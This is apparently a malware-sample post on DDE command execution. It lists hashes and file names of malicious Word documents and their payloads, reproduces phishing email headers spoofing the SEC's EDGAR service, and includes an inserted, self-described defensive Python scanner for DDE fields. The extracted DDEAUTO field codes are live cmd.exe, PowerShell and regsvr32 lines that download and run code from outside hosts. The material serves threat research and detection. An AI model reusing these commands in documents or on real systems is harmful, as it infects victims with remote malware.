
    Friday, January 26, 2024

    DDE Command Execution Malware Samples
    Here are a few samples related to the recent DDE command execution technique.
    Links updated: Jan 20, 2023


    References


    File information
    List of available files:
    Word documents:
    bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
    1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
    4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
    9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
    7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
    313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
    9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
    8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
    11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
    bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

    Payload 
    8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
    2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
    316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
    5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
    fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


    File details with MD5 hashes:
    Word documents:
    1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
    bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

    2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
     2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

    3. 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
    8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

    4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
    78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

    5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
     aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

    6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
    507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


    7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
    47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

    8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
    47111e9854db533c328ddbe6e962602a


    9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
    d78ae3b9650328524c3150bef2224460


    10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
    5786dbcbe1959b2978e979bf1c5cb450
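The field codes above all follow one shape: a DDEAUTO field whose "server" is cmd.exe or powershell.exe, reached directly or via the "\..\..\" walk out of the Office install directory. As an added defensive example (this is not code from the original post and not one of the samples), the Python scanner below opens a .docx as the zip container it is, pulls every field code out of word/document.xml (both w:fldSimple attributes and the w:instrText runs of complex fields), and flags any DDE/DDEAUTO field, marking it "malicious-pattern" when the code also references cmd.exe, powershell, regsvr32 or the parent-directory walk. The three documents it scans are constructed in memory; their field codes, file names and the inert echo command are invented for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

def wtag(name):
    """Clark-notation tag for an element in the WordprocessingML namespace."""
    return "{%s}%s" % (W_NS, name)

# DDE or DDEAUTO as a field keyword; Word resolves the link when the
# document is opened (DDEAUTO) or when fields are updated (DDE).
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
# Markers seen in the field codes of the samples above: cmd.exe, powershell,
# regsvr32, and the "\..\..\" walk out of the Office install directory.
SUSPICIOUS_RE = re.compile(r"cmd\.exe|powershell|regsvr32|\\\.\.\\", re.IGNORECASE)

def extract_field_codes(docx_bytes):
    """Return every field code in word/document.xml as a string.

    Simple fields keep their code in <w:fldSimple w:instr="...">. Complex
    fields spread it over <w:instrText> runs between a 'begin' and a
    'separate'/'end' <w:fldChar>; those runs are joined here, and
    root.iter() walks them in document order.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    codes = [fs.get(wtag("instr"), "") for fs in root.iter(wtag("fldSimple"))]
    buf = None
    for el in root.iter():
        if el.tag == wtag("fldChar"):
            kind = el.get(wtag("fldCharType"))
            if kind == "begin":
                buf = []
            elif kind in ("separate", "end") and buf is not None:
                codes.append("".join(buf))
                buf = None
        elif el.tag == wtag("instrText") and buf is not None:
            buf.append(el.text or "")
    return codes

def scan_docx(docx_bytes):
    """Return (field_code, verdict) for every DDE field in the document.

    verdict is 'malicious-pattern' when the code also matches SUSPICIOUS_RE,
    otherwise 'dde-field' (a DDE link that still deserves a look, since
    legitimate ones are rare in mail attachments).
    """
    findings = []
    for code in extract_field_codes(docx_bytes):
        flat = " ".join(code.split())
        if DDE_RE.search(flat):
            verdict = "malicious-pattern" if SUSPICIOUS_RE.search(flat) else "dde-field"
            findings.append((flat, verdict))
    return findings

def make_docx(field_code):
    """Build a minimal .docx in memory (constructed for this demo, not one of
    the samples above) holding one complex field with the given code."""
    runs = (
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>field result shown to the reader</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    ) % escape(field_code)
    document = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<w:document xmlns:w="%s"><w:body><w:p>%s</w:p></w:body></w:document>'
                % (W_NS, runs))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
    return out.getvalue()

# Constructed field codes: a harmless DATE field, a plain DDE link to Excel,
# and a DDEAUTO field shaped like the ones in the samples above but with an
# inert echo in place of the downloader.
SAMPLE_FIELDS = {
    "date.docx": r'DATE \@ "M/d/yyyy"',
    "excel-link.docx": 'DDEAUTO excel "book1.xlsx" "Sheet1!R1C1"',
    "dropper-shaped.docx": r'DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C echo constructed"',
}

def scan_samples():
    """Scan the constructed samples; returns {name: verdict or None}."""
    return {name: (scan_docx(make_docx(code)) or [(None, None)])[0][1]
            for name, code in SAMPLE_FIELDS.items()}

if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print("%-22s %s" % (name, verdict or "clean"))
```

To run it over real attachments, pass the file's bytes to scan_docx(); the same field extraction works for .dotx and macro-free .docm, since all of them keep the body in word/document.xml. Fields inside headers, footers and footnotes live in other parts of the package (word/header1.xml and so on), so a production scanner should iterate over every word/*.xml part rather than the body alone.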


    Payload Powershell

    1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

    2. 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

    Payload PE

    1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
    3a4d0c6957d8727c0612c37f27480f1e

    2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
     4f3a6e16950b92bf9bd4efe8bbff9a1e

    3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
    09d71f068d2bbca9fac090bde74e762b
    Message information


    For the EDGAR campaign
    bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

     Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])
    by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
    (version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
    for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
    Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
    (envelope-from <EDGAR@sec.gov>)
    id 1e28HE-0001S5-Ew
    for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
    To: <snip>
    Subject: EDGAR Filings
    X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
    X-PHP-Originating-Script: 658:class.phpmailer.php
    Date: Wed, 11 Oct 2017 04:05:48 +0000
    From: EDGAR <EDGAR@sec.gov>
    Reply-To: EDGAR <EDGAR@sec.gov>
    Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
    X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
    boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
    Content-Transfer-Encoding: 8bit
    X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
    X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
    X-AntiAbuse: Original Domain - nu.com
    X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
    X-AntiAbuse: Sender Address Domain - sec.gov
    X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
    X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
    X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
    X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
    X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
    X-CLX-Shades: Junk
    X-CLX-Response: <snip>
    X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
     signatures=0
    X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
     suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
     lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
     adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
     definitions=main-1710110060

    This is a multi-part message in MIME format.

    --b1_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: multipart/alternative;
    boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

    --b2_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: text/plain; charset=us-ascii

    Important information about last changes in EDGAR Filings


    --b2_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: text/html; charset=us-ascii

    <b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>



    --b2_7608a3de5fe6c9bf7df6782a8aa9790f--

    --b1_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

    <snip>


    --b1_7608a3de5fe6c9bf7df6782a8aa9790f--


    For 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

    Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
     AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
     Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
     15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
    Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
     VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
     Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
     15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
    Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
     (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
     (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
     cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
     2017 10:45:14 +0000
    Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
     VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
     SMTP Server (version=TLS1_2,
     cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
     Transport; Thu, 12 Oct 2017 10:45:14 +0000
    Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
     DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
     Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
     15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
    Received: from <snip> (10.234.178.186) by
     <snip>(10.144.20.58) with Microsoft SMTP
     Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
    Received: from <snip> (10.234.174.102) by
     <snip> with Microsoft SMTP Server
     id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
    Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
     Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
     11:43:38 +0100 (CET)
    Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
     rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
     12 Oct 2017 11:43:36 +0100
    Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
     rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
     11:43:36 +0100
    Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
     [188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
     <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
     v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
     (BST)
    Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
    (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
     certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
     571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
    From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
    To: <snip>
    Subject: Document
    Thread-Topic: Document
    Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
    Date: Thu, 12 Oct 2017 10:43:35 +0000
    Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
    Content-Language: en-US
    X-MS-Exchange-Organization-AuthSource: <snip>
    X-MS-Has-Attach: yes
    X-MS-TNEF-Correlator:
    received-spf: Fail (protection.outlook.com: domain of <snip> does
     not designate 147.152.120.47 as permitted sender)
     receiver=protection.outlook.com; client-ip=147.152.120.47;
     helo=<snip>;
    x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
    x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
    x-ms-publictraffictype: Email
    X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
    Content-Type: multipart/mixed;
    boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
    MIME-Version: 1.0
